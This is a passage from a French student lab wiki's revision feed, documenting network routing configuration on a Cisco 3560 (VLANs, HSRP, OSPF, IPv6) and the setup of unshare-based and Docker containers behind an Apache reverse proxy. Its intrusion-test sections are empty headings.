La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir de '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 (avec IPv6) =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  ipv6 router rip tpima5sc&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 et IPv6) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  no int vlan 131&lt;br /&gt;
  int vlan 131&lt;br /&gt;
   ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification avec Google.com =====&lt;br /&gt;
&lt;br /&gt;
On récupère une IPv6 de google avec la commande &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; depuis une zabeth puis on tente depuis le routeur de ping cette adresse&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping v6 google.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49110</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49110"/>
				<updated>2018-12-21T15:40:56Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* L'architecture générale */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
